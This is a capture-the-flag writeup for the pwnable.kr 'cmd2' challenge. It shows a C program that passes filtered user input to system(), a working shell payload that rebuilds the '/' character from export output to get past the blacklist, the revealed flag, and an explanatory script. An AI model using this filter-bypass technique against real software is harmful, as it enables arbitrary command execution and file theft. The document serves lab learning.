I tried all night and finally worked it out.... Truly full of twists and turns; this one tests your Linux shell scripting.
Here are the points to note:
1. sh and bash on Linux are not the same thing, and what sh actually is differs from system to system. sh was designed for UNIX and is stripped down, with fewer features than dash, so while debugging the script I hit many errors I did not know how to fix and had to work through them step by step;
2. The key is to construct the "/" character;
3. With this, Toddler's Bottle is finished, and my tutorial has also reached Lesson 3. There are very few writeups for the next set of challenges and I find them harder, so maybe I will switch to Protostar for practice? Slow at the start, faster later ~
    [email protected]:~$ ls
    cmd2  cmd2.c  flag
    [email protected]:~$ cat cmd2.c
    #include <stdio.h>
    #include <string.h>

    int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "'")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
    }

    extern char** environ;
    void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
    }

    int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system(argv[1]);
        return 0;
    }
    [email protected]:~$ ./cmd2 'str=$(export);str1=${str#*home};str2=${str1%cmd2*};str3=${str2}"usr"${str2}"bin"${str2}"find";str4=${str2}"usr"${str2}"bin"${str2}"xargs "${str2}"bin"${str2}"grep a";$str3|$str4'
    str=$(export);str1=${str#*home};str2=${str1%cmd2*};str3=${str2}"usr"${str2}"bin"${str2}"find";str4=${str2}"usr"${str2}"bin"${str2}"xargs "${str2}"bin"${str2}"grep a";$str3|$str4
    /usr/bin/find: './.bash_history': Permission denied
    /bin/grep: ./.bash_history: Permission denied
    ./flag:fun_w1th_5h3ll_v4riabl3s_haha
    ./cmd2.c:int filter(char* cmd){
    ./cmd2.c:r += strstr(cmd, "flag")!=0;
    ./cmd2.c:extern char** environ;
    ./cmd2.c:char** p;
    ./cmd2.c:int main(int argc, char* argv[], char** envp){
    ./cmd2.c:putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    ./cmd2.c:if(filter(argv[1])) return 0;
    ./cmd2.c:printf("%s\n", argv[1]);
    ./cmd2.c:system(argv[1]);
    Binary file ./cmd2 matches
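How the two parameter expansions in the command above produce "/", and why filter() never sees it: the check runs on the raw argument text, before the shell started by system() expands anything. This is an added example, not part of the original writeup. The export listing is a constructed sample that assumes the shell re-creates PWD as /home/cmd2, and filter, derive_slash and build_path are hypothetical helper names.

```shell
#!/bin/sh
# Constructed stand-in for what `export` prints inside the shell started by
# system(): the inherited environment was wiped, PATH was set by putenv(),
# and the shell itself re-creates PWD (assumed to be /home/cmd2).
sample_export="export PATH='/no_command_execution_until_you_become_a_hacker'
export PWD='/home/cmd2'"

# Shell re-implementation of cmd2.c's filter(): 0 = allowed, 1 = rejected.
filter() {
    case $1 in
        */*|*\'*|*flag*) return 1 ;;
        *) return 0 ;;
    esac
}

# The two expansions from the writeup, applied to an export listing.
derive_slash() {
    str=$1
    str1=${str#*home}    # drop shortest prefix ending in "home"  -> /cmd2'
    str2=${str1%cmd2*}   # drop shortest suffix starting at "cmd2" -> /
    printf '%s' "$str2"
}

# Join path components with the derived separator; "/" is never typed.
build_path() {
    sep=$1; shift
    out=
    for part in "$@"; do out=$out$sep$part; done
    printf '%s' "$out"
}

slash=$(derive_slash "$sample_export")
printf 'derived separator: %s\n' "$slash"
printf 'rebuilt path:      %s\n' "$(build_path "$slash" usr bin find)"

# The filter sees only the unexpanded text, so the literal path is blocked
# while the expansion that yields the same path passes.
for candidate in '/usr/bin/find' '${str2}"usr"${str2}"bin"${str2}"find"'; do
    if filter "$candidate"; then verdict=passes; else verdict=blocked; fi
    printf '%-45s %s\n' "$candidate" "$verdict"
done
```

A substring blacklist in front of system() constrains the spelling of the argument, not what the shell ends up executing.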
"LINUX" pwnable.kr cmd2 writeup